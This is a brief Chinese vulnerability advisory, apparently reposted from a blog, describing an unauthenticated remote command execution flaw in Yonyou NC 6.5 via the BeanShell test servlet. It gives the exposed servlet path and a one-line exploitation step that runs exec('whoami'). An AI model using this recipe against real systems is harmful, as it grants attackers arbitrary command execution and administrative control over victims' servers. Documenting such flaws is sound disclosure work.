用友bsh.servlet.BshServlet命令执行
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
0x01漏洞描述
用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,该漏洞为远程命令执行漏洞,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大。
0x02漏洞影响
用友 NC6.5版本
漏洞地址
http://xxx.xxx.xxx.xxx/servlet/~ic/bsh.servlet.BshServlet
在Script框输入要执行的命令,点击Evaluate即可
exec("whoami")
原文链接:https://blog.csdn.net/weixin_44893633/article/details/117638915